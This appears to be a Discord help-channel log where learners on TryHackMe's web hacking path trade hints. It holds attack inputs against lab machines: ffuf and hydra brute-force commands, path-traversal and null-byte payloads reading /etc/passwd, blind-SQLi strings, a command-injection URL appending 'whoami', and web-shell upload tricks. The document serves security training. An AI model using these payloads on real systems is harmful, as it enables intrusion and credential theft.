I'm having some issue in authentication bypass(Username enumeration) while using fuzz tool, it's saying that flag provided but not defined, What's the issue?

@halcyon mortar

@halcyon mortar Now works thanks!

Gave +1 Rep to @halcyon mortar

Hi everyone. I’m in the Upload Vulnerabilities room, on the challenge part (task 11).
I run into trouble getting Burp Suite to intercept and display the js files coming back from the target server.
Would appreciate some help. May I post details?

Yes, please do post more details

Cool, thanks. I start Burp Suite, set the scope to http://jewel.uploadvulns.thm, then edit the Proxy Options to remove ^js$| from the list of file extensions that Burp won’t intercept.
Then turn Intercept on and load http://jewel.uploadvulns.thm from my browser.
I use ‘Do intercept’ > ‘Response to this target’, to get Burp to display the js file sent back. This works the first time. Then whenever I try to reload the page (say when I want to modify one of the incoming js files in a different way), the js files are not displayed anymore. So I have no way modify them. Quitting and restating Burp Suite won’t help. Any way I can avoid that?

For file inclusion challenges, what is a good way to host these files to be accessed by the site

I tried this and while I can open in a tab, I get errors saying "couldn't connect to server"

and "failed opening"

uses https://http.cat/ to check what 304 response code is

is there an IP i should put it on?

or somewhere i can read about it

tun0?

How do I go about trying to troubleshoot this

I dont really know what to even search for to get a relevant result

oh my god damnit

my dumbass is thinking it's the port :

but youre right its the : in the actual file lmao

@halcyon mortar thanks for the help.

Gave +1 Rep to @halcyon mortar

Hi lassi. I actually had figured it was because of cached content. But clearing out the cache in my browser (Firefox btw) doesn't help. Restarting Burp neither. It seems I also have to quit the THM machine altogether, then restart one from the TryHackMe page, then edit my hosts file over again, etc.
Is there any setting in Burp Suite to ignore cached content and reload js files (or other files for that matter) regardless of the fact that they were already downloaded once?

Or actually, it may be more up to a setting on the browser? 🤔 Either way, a nudge would be appreciated.

There's a rewrite rule defined in Burp to require a non cached response, you can enable that

And here I thought I was smart

So, why does private IP work for RFI and the public IP doesn't? I tried getting RCE on the RFI challenge in the File Inclusion room and was trying to access the shell via the public IP, but it didn't work. Then, I tried with Attackthebox's private IP and it worked

The target machines don't have internet

I see. Forgot about that 😄

Thanks James. Any clue where in Burp I can find that rule? Googling doesn't seem to turn up much.

Gave +1 Rep to @orchid hazel

Proxy options, I'll load burp rq

There's two, both non-cached

Great! I'll play with that and let you know. 👍

Hey

Can anyone give me a tip for Lab Challenge 3 on the File Inclusion room?

Don't know how to approach that one

../../../../etc/flag3
tried putting an url in the form
tried checking for cookies or headers
../../../../etc/flag3/.
../../../../etc/flag3%00
....//....//....//....//etc/flag3
The characters . / %00 and numbers aren't accepted, so I don't know what else to test

yes

Idk either what I want, but I'll try

Thanks

Gave +1 Rep to @halcyon mortar

That was actually not so hard, but a bit trippy on what I had to use.

Auth bypass task 2: bruteforcing a signup page does not produce the expected result. Ive done this command: ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.63.46/customers/signup -mr "username already exists"

Unfortunately I cant post any screen shot there

How would one go about finding the ip address of a target webserver if it is not given? I am doing a challenge for the first time where we don't know the ip

Check out: https://tryhackme.com/room/dnsindetail

Thank you so much!!

Gave +1 Rep to @languid dirge

When I was doing the SQL Injection room and was on task 8, I noticed that sending admin123' UNION SELECT 1,sleep(2) from users where username='admin' and password like '_%';-- was giving valid answer. Thot the password didn't start with _ as I learned after a bit, I still don't understand why the web server gave me a valid answer(the time delay) when I provided the _ character in there

I didn't at the time, but now that you said so, I found out that by using underscore I can find out how many characters are in the field of data.

Thanks. I thought at the time that there was more going on(maybe on the server's db), but it seems like the underscore is used as a wildcard

Gave +1 Rep to @halcyon mortar

putting "&x=" in an url makes it ignore the rest of the url?

or does it have another effect?

like this: server.website.thm/flag?id=9**&x=**

for ssrf yes

why? is it related to encoding?

not sure exactly why no

thanks

i dont get why we use encoding

You can't send some data in URLs, or it can get messy.

If you want to send binary data as text, base64 is designed for that

what u mean by binary data?

by some data u mean parameters?

Non-text

By some data, I mean binary data

like what

If you try to send a file that has null bytes in, it won't work

You can't think of any files on your computer that aren't text files?

Programs, music, videos, database files, images

yeah u can pass like an image directly in the url

but why do we do that

Only if you encode it

but why we pass them in the url

Why not?

How else are you going to send them? In the request body? That usually has to be encoded too

but "{id: 10}" is a text data why do we encode it

Because someone chose to

It'd usually be URL encoded if it was in a URL or request body, but here it's base64 instead

thank u man, appreciate it

I don't think so

referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- is not causing the sleep to work

in the blind sql time based room for sql injection

I think I did 'referrer=admin' and it worked

yay! done with the path!

kudos!

I have a question:

I've come across these 3 tools: ffuf, gobuster and dirb.

I know that these 3 tools are used to bruteforce URIs to find hidden or public directories/files.

But what is the difference among these 3 tools?

The languages in which they are written.

Check out feroxbuster too.

try all 3 of them. some are faster with more options and so. gobuster is pretty common. for my self i prefer ffuf

I see

So these 3 tools do almost the same things so choosing one of them will depend on the execution speed and other options

Ffuf is kinda different to the other two that you mentioned. It can do all the same and more. Read the manuals/docs/readme for each od them, and you'll understand what they do and do differently

Alright thanks

hi

SSRF task 2, after clicking "view site" theres no page loaded it says "static-labs.tryhackme.cloud took too long to respond." I've tried re-entering the room as well as refresh page :/

i am facing same problem

works for shadow

can you try clicking the minus button at the bottom and then clicking the view site button again???

tried

no work???

i mean it worked without clicking the minus button

out of sudden it jz worked haha thanks anyway

oh great

thanks!

Gave +1 Rep to @analog barn

Hello guys, can someone help me do the File Inclusion room? The Challenge part?

😦

Ok i will try harder

The links at the bottom of that page are high-quality too. The Eric Steven Raymond link on catb.org is legendary.

http://catb.org/~esr/faqs/smart-questions.html

In no way a jab at your question forming capabilities @vestal tinsel , just a good read.

it would have been great if the modules had audio playback option for the theorytical parts.

Try and send that to the feedback form that is linked in #feedback-and-ideas .. As then the staff of the website can see it easier and consider it

Yea i understood. It really was a great read! But at the end i've managed to do the challenge. I was in the wrong link! 😅

I did the same myself yesterday

is the wordlist from Task 11 installed in the attackbox? It seems to only lead me to install on my host machine

oh right, I am so sorry

Upload Vulns

Have a look and see

find wordlist.txt

If it's the attackbox the room won't matter.

Maybe @sand widget can help.

Ben, is the UploadVulnWordlist.txt on the Attackbox? I know it's a downloadable in task 11 in the room https://tryhackme.com/room/uploadvulns

It is not at the moment no

cc @trail bolt

Thanks.

Gave +1 Rep to @sand widget

No problem, do you think it'd be worth me adding it?

I would like it if you add it if you can, not sure if its a issue.

I'm not sure tbh, as I used my VM and downloaded it and save to my vm anyway when I done it months ago, unsure about new users/old users who haven't done it.

a link to download it from the box would help too if anything.

Yeah that's okay. I'll think I see mention of upload vulns quite a lot so it seems pretty popular. I'll make a note to add it alongisde the next set of changes for the attackbox(:

I appreciate it so much! I'll just go ahead and work on some other boxes then.

Oh, are you not able to access the wordlist?

If you're not, I'll put it on a machine real quick for you to wget/curl

if I can wget/curl to it, that would be awesome

I am happy with that

I use THM on my host machine so I normally just use the attackboxes

Yeah I'll sort that for you rn

Thanks!!

2 seconds(:

here you go @trail bolt http://10.10.35.222/UploadVulnsWordlist.txt

awesome, you are the best, I'll get it quick rn

sure 👍

Got it, thank you both so much

Ben and Scrubz!

No worries. I'll get it onto the AttackBox some time next week when I have other changes to make (:

+rep @restive hemlock

Gave +1 Rep to @restive hemlock

Hello guys, so im at LFI challenge for File Inclusion room, and i cant seem to look for the etc/flag directory... Tried the following steps:

1. changed POST from GET in the HTTP header using burpsuite
2. used LFI techniques to show /etc/passwd, no luck

At this point, i got stuck not knowing other options.

Any hints will be much appreciated. Thank you.

got the flag now. Yeah ur right. GET and POST requests are different. Thanks for the help @halcyon mortar

Having an issue getting into the ctf webpage http://MACHINE_IP/challenges/index.php reciving a 405 error

step one...: search for the task with a green start machine button... click it and wait for the ip to be revealed... make sure you are connected to the vpn or are using the attackbox and then connect when the ip is vissible

the green public ip is whats giving me the error message

!docs verify

then a picture of the where you found the ip and where you are trying to connect

@chrome magnet ⬆️

well just like shadow thought you are connecting to the wrong ip

see task 2

see that it has a green start machine button inside it

hit that... then wait a while

then you will get a box like this

which will show an ip after about 1 min

@chrome magnet ⬆️

thank you

Gave +1 Rep to @sweet python

no problem

Hello, I am working on Web Enumeration room and finished "Practice: Gobuster" Module. I was able to get the flags through typing the appropariate directories on the brower; However, I was wondering if there is a way to cat the flag file on the shell?
https://tryhackme.com/room/webenumerationv2

Can someone help me with the SSRF Room? I don't seem to understand how you can influence the output by changing the URL

What is it that you don't understand? Do you have a particular task?

Curl is the answer

Hey could someone help me out?

i'm on task 9 trying to wpscan the wpscan.thm site but following error: The remote website is up, but does not seem to be running WordPress...

full command plz

Hey yo

Im stuck at web fundamentals > subdomain enumeration > task 6

Where is this fuff?

Mh? It's a tool installed on your attacking machine

Nope

Do i have to install go 1.16 and fuff on this ?

What OS are you using? But ye, if ffuf is not installed you have to get it

Kali

That’s the attack box right?

Don't know if you are using the attackbox or the kali vm

But pretty sure ffuf is already on the attackbox

And most likely even on the kali vm

You type ffuf not fuff, right ?

Lol no

Well

I selected attack box > the start attack box

Ye, it's certainly on the attackbox

Ill be in 52 sec.. let me recheck

Oh crap.. I misspelled it

Sorry

Thanks

Not an issue

hi @misty shadow

cant find any subdomains using ffuf. subdomain enumeration module lab 6

this is the command im using -> ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.131.156

i think i did.. hold on

Hey there.
There is no need to ping anyone if you have a question, just state the room, task and any other useful information, if someone has an answer for you, they will reply 🙂

okay 👍

Wrong IP, you Fuzz your own attackbox rather than the target machine

oh

whats the target machine ip?

I don't know, you have to start the target machine and check the box that's looking like that:

Target machine = Green button in one of the tasks saying "Start Machine"

ohh

okay

gotcha!

thanks for your help!

Oof, who do you expect to read all of that 😄

But at least you are trying to be detailed 😄

i'm going to delete it, and try and shorten it some more 😦 (that's the best i can do)

Hey Guys, I have a question regarding Local File inclusion under the "intro to Web Hacking" path.

In labs 1 Through 3 the goal is to access a file (/etc/passwd) by exploiting a web application on a THM machine. The website looks like the following - and on labs 1&2 i can read the /etc/passwd file successfully in 1 of 2 methods

Method 1 - by using the search box provided on the website, and entering "/etc/passwd" on lab 1 and "../../../../etc/passwd" on lab 2 respectively.

Method 2 - By going into the URL , and simply entering the URL [Machine IP/lab1.php?file=/etc/passwd] [Machine_IP/lab2.php?file=../../../../etc/passwd] for Lab 2 respectively.

labs 1&2 give you access to the source code where as lab 3 does not, due to this it states that we have to test the entry point and input an invalid input "THM" into the search bar provided to get the following error

• "Warning: include(includes/THM.php)[function.include]: failed to open stream: No such file or directory in /var/www/html/lab3.php on line 26"

This is to understand what directory we need to access (in this case, we need to move up 4 directories -

so in the search bar provided and enter "../../../../etc/passwd" and get the following error

• "Warning: include(includes/../../../../etc/passwd.php)[function.include]: failed to open stream: No such file or directory in /var/www/html/lab3.php on line 26"

Up to this point - Method 1 and method 2 are not pulling the /etc/passwd file but when i continue to read, they state that we have to add the "null byte" which is %00.

When i test Method 1 and enter "../../../../etc/passwd%00" it still returns an error

When i Test method 2 - and modify the url to read {MACHINE_IP/lab3.php?file=../../../../etc/passwd%00 - It does not receive any error and successfully pulls the /etc/passwd file.

I'm confused and uncertain on how to get method 1 to be successful but in method 2, i understand and can read /etc/passwd. Is there a way for Method 1 (using the search bar provided on the website) to be successful?

If you enter the null byte in the search bar, it's getting URL encoded.
You should be able to see that in the url bar that it's appending %2500 instead of just %00

i do notice that yes, but i'm still uncertain on how to have method 1 be successful in reading /etc/passwd for that lab.

i see that my entire input gets encoded, and anything after file is broken up with %2f

Well, considering parameter in a GET request are being send via the URL, I don't see the need to get method 1 working.
All the search bar is doing, is appending your input URL encoded to the URL as the "file" parameter
From the top of my head I can't think of a way to get it working from the search bar, but either way, it's kind of useless to put effort in that

well truthfully - i'm very new to this whole concept and environment and that's what i was trying to understand. in general, for this type of vulnerability - we wouldn't necessarily interact with the web page - but rather the URL and the vulnerability we're seeking to exploit?

Ye, I would say you would usually intercept that request in Burp and use repeater to play around and test, thus meaning you are just altering the parameter in the URL

Thank you for the help!

Gave +1 Rep to @misty shadow

Hello, somebody can help me for the crontab ?

here is the question : When will the crontab on the deployed instance (10.10.183.70) run?

in the crontab file all is by default except one line and this is not the response

can you ping me ? thanks

Best to verify and show a screenshot of what you see in there

!docs verify

thx it's done

the response is in 7 letters

Correct and the answer is right in your screenshot

omg i found

thank you 🥲

Just curious Is there a room for Oauth 2.0?

Hi all, I am halfway done with this path, I am learning about because I knew less than nothing about web hacking

32% done

Hi. I checked my spelling and tried dl ffuf. But the instructions says Attackbox come with it. Yet I'm faced with "ffuf:command not found". Can advise where went wrong? Appreciate it!

hi

$str = 'INPUT HERE';
$pattern = '/flag/i';
echo $sec= preg_replace($pattern, '', $str);
?>```
I want to reach $sec=='flag'

Is this part of an active CTF?

In the 'intro to web hacking' module right now, XSS room, last question. Task is to capture cookie through XSS, base64 decode. This doesnt work though lol. including the 'session=' or not, neither works. I ended up checking out a walkthrough and it shows the same method I did so Im stumped

Are you using attackbox or your own VM?

@brazen mauve VM, said use AB if exploit doesnt work but im able to capture cookie

Use attackbox for this task

different cookie?

you will get staff cookie

ah

@brazen mauve lmao thanks, AB is a pain so I try avoid it

Gave +1 Rep to @brazen mauve

You got staff cookie?

oh yeah AB worked

Hey,

@Authentication bypass task 3, we use the fuff tool to bruteforce a list of usernames with a list of passwords. The username list we created in task 2 by piping the results into a .txt file.

When trying to use this result in part 3, I don't get any output. However if I were to copy the content of the file and paste it into another .txt file, I get the correct results.

Any pointers for what the difference between a piped created file and a manually created file is?

It might output the file in a different format, where the line endings are different

guys what about a subdomain enumeration room, can you help me why ffuf -fs not filtering by size, i'm providing the most repeated one - 472

haha, that's funny, cuz the task pointing you that the first subdomain discovered should be written to the answer below, but actually it's the second xD

Are you on a VM or attackbox?

Because it works as intended in the attackbox.

on VM

Possibly why.

If you take the word list from the attackbox, it should work as intended.

okii, ty 😄 should i delete those msgs?

Just edit out the answer with spoilers or delete the flags.

Hey, I am currently doing the SQLi Room but I have a question, hopefully somebody could help me out here! ^^ So, a request to the server would be something like this "SELECT * from table", but it could also be something like "SELECT username,password from table". Why now are we checking for an SQLi by typing "1 UNION SELECT 1,2,3"? I don't mean the "1 UNION" part, but rather the following. Doesn't the * that got replaced by the "1,2,3" now just look for numbers in the table "table"? I am so confused

I'm confused by your question, but I think you maybe misunderstood the concept of UNION and the select part. First, the two parts before and after the union do not interact with each other in any way. They return tables and those two resulting tables are just concatenated. So the * and the 1,2,3 do not interact. You just need to make sure, both tables have the same number of columns. SELECT * does not tell you how many columns there are, so we have to try several options.
Second: SQL does not "look for numbers" . SELECT 1,2,3 is a simple query that just returns a table with 1 row and 3 columns containing the 3 numbers. Normally in SQL you write the column name in the select part, like SELECT user, password, email FROM x to tell SQL that you are only interested in those three columns. But you can also write SELECT user, 17, password FROM x. There you get again 3 columns and one row for each user. However the value in the second column will always be 17.

Not sure if this clears things up 🙂 I'd advise you to take some database and live execute manually some queries there and slowly progress to get an understanding how SQL behaves.

That helped a lot, thank you!

Gave +1 Rep to @obsidian roost

Glad to be here guys! 🙂 Hope to contribute to the community

This hacking path is exciting

Hope soon doing it!

Hi guys, I'm in the Authentication ByPass Module, I don't know if this is the right channel to ask.

The attackbox is desployed but I don't get the IP to practice

http://MACHINE_IP/customers/signup

I'm trying to see the Acme IT SUpport website with the Public and Private IP of the Attackbox but it doesn't work.

look for this icon on a task and then that green start machine button to start your target machine.... then wait 1-5 mins and you should get an ip

Thanks, it's working!

no problem

Guys, I'm in the module "Authentication Bypass"

I've been learning FFUF,

But do you know how to bypass a form when the action is to another file?

I'm using "-r" in the commands, but it doesn't work.

For example, I have the file "index.php" where the form is.

And this is the code

<form action="welcome.php" method="POST">
<input type="text" name="password">
<input type="submit">
</form>

When I add a password "123", welcome.php returns "this is the flag"

I'm doing this with FFUF

ffuf -w passwords.txt -u https://url.com/index.php -X POST -d "password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -mr "this is the flag" -r

but it doesnt work.

I believe you need username field amd check your url https:..

Do you understand what action means on an HTML form element?
Have you looked at what's happening in Burp to try and understand?

No username in that form that they posted.
There's another bigger issue.

In the file inclusion room, shouldn't it be http://webapp.thm/index.php?lang=/etc/passwd instead of http://webapp.thm/get.php?file=/etc/passwd. If this is not a mistake on tryhackme's behalf, can someone explain how http://webapp.thm/get.php?file=/etc/passwd would work?

ok thanks!

Gave +1 Rep to @halcyon mortar

I just want to double check my understanding, but how would you explain the differences between RFI and SSRF?

I mean, they're completely different. The only similarity is that a request is made.

interesting. I obviously googled "SSRF vs RFI" etc. before messaging here and the answers I got is that an RFI basically is a type of SSRF. If you see them as completely different, can you clarify those differences for me?

I guess you could argue that but it's a really weird argument to make

why is it weird? whats the biggest difference that comes to your mind? From what I could understand, RFI deals with code injection from a remote file, where as SSRF deals with any request made on the target servers behalf. Therefore, RFI and LFI attack would fall into the category of an SSRF attack. What do you think?

"Inclusion" is a massive part of LFI and RFI, and people constantly confuse LFI and file read

thanks for your input James!

Gave +1 Rep to @orchid hazel

Hello can anyone suggest me the web fundamentals

I mean path or something like that

@halcyon mortar where i find?

Do you know anything about two sides?

Check hint, answer is there

The answer is not front end. Don't copy from the videos, you don't learn anything that way.

hi

Hi guys, for the Burp Suite - Intruder, I don't have the same thing on my burp as the one on the tutorial and I can't figure how to, is it normal ? If not, how do i fix it ? Thanks

well maybe some update to burp suite changed it.... but the attackbox should work as it uses a version of burp that should work for all currently accessable rooms

i have :

Host: 10-10-25-68.p.thmlabs.com``` the tutorial has : 
```POST /support/login/ HTTP/1.1
Host: 10.10.25.68```

and at the end of this there is in the tutoriel a id / passwd (that we'll use in the tutorial) but i don't have it...

Burp works but I don't have a webpage that allows me to apply the technique of the room

These are 2 different requests

I know, the first one is the one I have when I follow the room's instructions, and the second one is the one I am supposed to get, and i'm trying to udnerstand what i'm doing wrong because what I have does not allow me to do the room'ss challenges

Which task are you doing ?

In the BurpSuite - Intruder, I'm at the Attack Types Sniper (Task 5)

i'm supposed to get something like this

But as I showed here I don't 😦

Yes, you have to make an actual login attempt to capture that request

Do you see this message or is the red because my message don't send ?

Whut

How would I know if I see the message or not 😄

The last message I see is But as I showed here I don't

Ok so there was indeed an error

Do you see the picture ?

Share the link you are talking about

i'm using the attack box and I use this adress, that is given in the first task : https://10-10-44-18.p.thmlabs.com

There is no login option

But you know the url, so just append /support/login to it

I tried but it didn'tr work lete me try again

I've relaunched everything

Ok there was something off but I think I've managed to get on the right path, thanks all for your help ^^

Why aren't the IP's showing up on the Linux Fundamentals page? The IP to ssh tryhackme@IPgoeshere is not available.

rephrase: Getting past task 2 in LInux Fundamentals 2 doesn't even give me the IP to ssh tryhackme@MACHINE_IP

the MACHINE_IP doesn't even show up on the page

so how the hell can i get past this

kinda bullshit imo

ok now it work

So, it's not bullshit after all?

Hey whats up? Need a hand here!

I am on task 7 on OWASP top 10 and it says to log into http://MACHINEIP:8888 but it does not work

Does it really say "machineip" in the text/url on the room page or did you change that just for discord?

just changed it for discord

Let me have the machine IP then pls

I just reseted it for the third time

one minute

10.10.132.227:8888, it seems to be working now

Ok

thanks for the attention

No. I just realized how lacking my understanding was. Now I’m laughing about how easy that was!!

you just have to give the machine up to 1 minute to start and display the ip address, patience is key my friend

I'm getting closer to completing this path. Can't wait.

hi guys anyone can help with web fundamentals file inclusion task 8 challenge 4 RFI?

tried with s3 bucket, google disk, github, when entering url of attackbox, method is not allowed

not familiar with web hosting and stuff

tried apache2 installation but got error no ports available to listen -something like that

Port 80 on the attackbox is in use. Use a different port.
The target machines don't have internet access so all of those methods won't work.

apache is up, port changed, php file created that echoes gethostname(). when i do rfi on that file on playgound room, html displays same output i get when running that file on its original domain

hmmmmmmmmmmmm

how then?

ftp?

I am attempting (and struggling) with the challenge task in file inclusion -- I've read the solutions/walkthroughs online require the use of burpsuite (something that has not been introduced in this learning path) -- is it possible to complete the challenge without using Burpsuite? the steps listed in the challenge encourage you to use the 'browser address bar' in its place, but Im struggling to figure out how to do so. any advice would be appreciated.

You can use curl to complete those challenges if you dont know how to use burp

so basicaly i hacked myself 🤣

genius

created python3 -m http.server

created php files: 1 with gethostname() other with php_uname('n') for older versions, tested in browser and there is download file link

when using this rfi urls in target domain as ?file or ?lang, ?file gives warnings "failed open stream /could not connect to server / failed opet file for inclusion), and when using ?lang - output is nothing

but i do not want the target server to download the file to its disk, right? i just want it to execute the code from remote url

i dont even see the target server making get request to my http.server

but i see this 😅
(firefox:4639): GLib-GObject-CRITICAL **: 11:55:33.062: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed

(firefox:4639): GLib-GObject-CRITICAL **: 11:55:33.062: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed

(firefox:4639): GLib-GObject-WARNING **: 11:55:33.065: ../../../../gobject/gsignal.c:3492: signal name 'load_complete' is invalid for instance '0x7fd0b1d68ce0' of type 'MaiAtkType139'

(firefox:4639): GLib-GObject-WARNING **: 11:55:33.065: ../../../../gobject/gsignal.c:3492: signal name 'load_complete' is invalid for instance '0x7fd0b1d68d30' of type 'MaiAtkType139'

(firefox:4639): GLib-GObject-CRITICAL **: 11:55:33.158: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed

(firefox:4639): GLib-GObject-CRITICAL **: 11:55:35.855: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed

i dont think i did this

tried with .txt files instead, also no improvements

tried putting command code in quotes as file value, no luck

hey lassi, i have tried this and could not get it working.. any hint?

Thanks for the feedback; I'll dig into curl. Much appreciated.

Gave +1 Rep to @brazen mauve

Thanks for the feedback;

Gave +1 Rep to @halcyon mortar

Thanks for the feedback;

Gave +1 Rep to @orchid hazel

not sure.. localhost?

so its local, not public

0.0.0.0:port

must be local

invalid or unassigned.. ok then i guess i should check out how to make public webserver with python

The definition in bold

ahhh ok got it

actually i dont get it completely

but conclusion is that my attackbox ip is the one to use

You can't use 127.0.0.1 or 0.0.0.0 as the IPs to request files from

Can you think about why?

What does 127.0.0.1 mean to the machine that's actually requesting the file?

its looking to its own localhost ip?

🙂

thank you both

Hi, I have a question on HTML Injection, why the heck is this exploitable? If a hacker has access to the web content of his own webpage, he can only pish himself and that is not what he wants. By the way, you can alter the web content of a webpage you see also when the server send javascript code that santinizes the user input. I've googled HTML Injection and I found that it is possible to redirect the target of e.g. a password. However, how could a hacker inject something to a user what is not much easier done with pishing & rebuilding/copy pasting the website?

Edit: I found an example, wikipedia and wikipedia-like websites. Are there any other examples?

Exploiting yourself is not beneficial, yes. But if it is possible to inject HTML code (apart from just modifying it in your browser), it might be possible to exploit it for others as well in same situations. Just like XSS vs. "Self-XSS".

Rebuilding the websites requires a diffenrent domain name while html allows to use the domain of a known website. So it is more likely to succeed

you ask how is html injection exploitable? i think it is sent as link to a legit but modified website that can easy trick the user to trust it because everything is real thing. Only if you dig into source code can you see that there is malicious code, and who does that

I might have a bit of a silly question, but i havent quite found the right way to google it. Lets say you have a command like this curl http://vulnerable.app/process.php%3Fsearch%3DThe%20Beatles%3B%20whoami Why the %3F %3D %2 etc? I understand they are necessary for seperation. But what determines how they look or is it just random? If anyone has an article or some information that i could read on html stuff like this i would be very grateful!

Google 'url encoding' that should explain everything

they are not random, they are actual characters

Wauw, never knew. Thanks so much man !

@obsidian roost @rare relic thank you both!

Gave +1 Rep to @obsidian roost

hey everybody, about burpsuite - intruder, Bonus Question - Optional: Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise.
What is expected from us to do here?

in the original question, solution was presented using group_concat so how do we automate this and for what purpose?

dis gud?

hello everyone i am stuck in 1 room at portswigger can you help me

11:room

i found password but not access

I don't understand, what is entropy ?

it is a measure of randomness, at least when you are talking about malware analysis

there is also another meaning that is from Chemistry

thermodynamics thing

Entropy describes something that was created to be used only once

hi there have a problem (i'm french for learn tryhackme ) i have a base in cybersecurity but have a problem for a question :

What do you need to access a web application? (I tried Web browser, software, and others and no way and yet it is necessarily that to launch a web application

may be the spelling in english
I don't know, any help would be appreciated)

can you provide a link to the room please

it's good it was about extra character I won't say the answer here so as not to bother other learners but it's good, thank you all the same for your speed of response 🙂

Gave +1 Rep to @sweet python

oh yeah shadow found the room and remember the answer just wanted to be sure before hinting at the solution

We don't have the same therme in French or at least the same translation concerning certain therme it's far from your fault 🙂 I just have to read and understand English better and know how to use the right words

Content Discovery

Here's a new problem I'm having:
we were asked to access http://VirtualIP/robots.txt knowing that it updates every 2 minutes

the question asks me the trajectory to get there but already the small flat: Error Response Method not allowed (What I understand that the method does not have the right one) or that I do not have the right.

but in logic the trajectory remains the same / Trajectory(ip)/robots.txt

I clearly understand how it works but this doesn't accept any of my answers.

Ha yes but what an idiot I am (I thought that the machine that we launch to work hosts in the same way our machine in which the attack must take place.)

Hi I have a problem with the room Burp Suite: Repeater. I’m currently working on task 6, I add the header as the task says but I have no response within Burp. I checked connection, VPN and everything is working, what could it be? Thanks

I receive an empty response after 30 seconds more or less

To complete the context, when I intercepted the request for the first time and forwarded (or repeated) without modify anything everything works, I have a correct response, after I add the header as the task says it suddenly stop working

I tried with cURL and worked, I don’t know if there is something wrong elsewhere

Oh ok, thank you 🙏

hi all, working on the "viewing source page" i have diffculties to reply to the
What is the flag from the secret link?

i found one after following the link found into the thm-web-framework, found a flag

but doesn't work for me

Try to take a closer look at line 41 when you "View Page Source", you might find what you look for 🙂

oup's thanks so much @gilded steppe 🙂

Gave +1 Rep to @gilded steppe

I think I need help. I am stuck on Task 8. I found the directory, but I can't upload my shell. No matter what file extension. Tried php4, php5, pht, phtml, phar. Is my room bugged?

Additional info: Working through VPN, hosts-file has been updated. I was able to clear the previous tasks.

You might also want to state the room that you are doing, since this path has quite a few 🙂

@misty shadow lmao - my bad. Upload Vulnerabilities Task #8 (Web Hacking Fundamentals)

Did you read that part of the task and tried it?

In the previous example we saw that the code was using the pathinfo() PHP function to get the last few characters after the ., but what happens if it filters the input slightly differently?

Let's try uploading a file called shell.jpg.php. We already know that JPEG files are accepted, so what if the filter is just checking to see if the .jpg file extension is somewhere within the input?

I did try it with my shell as .jpg.php5 and .png.php5 but both didn't work. I just assumed a picture format and took jpg for granted but couldn't make sense of the script files I found.

So what regular file format does the upload form support?
Did you enumerate that?

I look into that. I think I missed something. Thank you @misty shadow

Gave +1 Rep to @misty shadow

Mh, alright 😄

Hello! I am working through the authentication bypass room and was wondering, for the ffuf tool, why I do not have to put any of the other headers with the -H tag, only the "Content-Type:" one (at least in this case). Does it automatically put in all the other ones like "Accept-Encoding:", "Origin", "Referer:", etc. ?

would assume yes

or at least the default ones that a POST request uses

Okay, cool

Thanks!

Gave +1 Rep to @sweet python

no problem

got a problem with the owasp task 26 (insecure deserialization - code execution). the provided python script to generate the payload throws errors "mode pickle has no attribute dumps". anyone an idea?

nvm, got it resolved, shouldnt have named the file pickle.py duh

hello, i'm currently stuck at the walking an application course. There seems to be an issue with the website i'm told to work with, it keeps giving me the "504 gateway time-out". Anyone knows how to help? 🫶

Are you connecting to it via the machine IP or the provided URL? (The one that ends with thmlabs.com)

Yeah, I seemed to work out that issue now. Thanks for responding

Gave +1 Rep to @misty shadow

Not an issue, just so you aware, these provided URLs with LAB_WEB_URL.p.thmlabs.com sometimes take a bit longer to get accessible 🙂

got it thanks 😄

Upload Vulerabilities, Task 4, site overwrite.uploadvulns.thm does not exists.
I have started the machine and using AttackBox

Did you them all the to hosts file?

I have edited the /etc/hosts file and added the adresses

Hi all i was playing with owasp juice shop, exercice to brute force admin password using burp. I did it easily. I tryed to do it with hydra and it is not working and i wondering why 😦 what i did is : sudo hydra -l admin@juice-sh.op -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt 10.10.144.127 http-post-form "/rest/user/login/login:username=^USER^&password=^PASS^:F=Invalid email or password."

and i don't undersand my mistake 😦

oup's i understand 😦 here is the right command : sudo hydra -l admin@juice-sh.op -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt 10.10.144.127 http-post-form "/rest/user/login/email=^USER^&password=^PASS^:F=Invalid email or password."

a wrong copy paste 🙂

doubt theoretical content of Burpsuite repeater
can anyone help me?

The last line...As we know the table name and number of rows.....Table name I guess we found it by adding the ' to the GET..how were the number of rows determined

https://tenor.com/view/christmas-christmas-tree-art-dancing-design-gif-25680336

I feel like I'm probably missing something obvious. I'm doing OWASP top 10 task 5 and the site is not loading through attack box

just tried it and it seems to be working fine! can you tell me exactly what you did to try to access the website?

that looks like they meant to say number of columns rather than rows

hey i'm on ctf pickle rick i think it would be necessary to brute force the password of the user with hydra but that does not work, would somebody have a track?

thx ...

try typing http:// before overwrite.uploadvulns.thm !

There is password located on web server

I find Ricketmorty, this is a username, i try bruteforce with burp (intruder) but it gives nothing

i find also a directory /login.php

Its not the correct username, check source code and robots.txt

i find ahah i serch the 3rd flag

@placid spade I opened attackbox and entered the attackbox ip followed by /evilshell.php and I keep getting a 405

Wrong ip.

You keep to start the machine.

@restive hemlock Awesome I figured it out thank you!

Gave +1 Rep to @restive hemlock

@ornate stag so that means also not in here 🙂 see Jabbas message

hey i am in the subdomain enumeration room, task 6 (virtual hosts). wondering if "acmeitsupport.thm" is a URL?

if so, why am i not able to access it and only able to access through 10.10.69.197?

also why are we filtering my 200 success code here? and why is 302 code the right answer? for task 3 under authentication bypass room

302 == found
200 == ok

@rare relic ⬆️

but why are we getting ok? shouldnt we be getting 400 if the password is wrong?

i thought each request is sent to the webserver with the user name and password and if we have the wrong password, shouldnt we be getting 403

no... it returns a working html page even if your password is incorrect just with the message password or username incorrect

302 means it most likely going to redirect you to another page

is that typical on how webpages work? then how would you typically enforce lockout restrictions etc? wouldnt it be based on response?

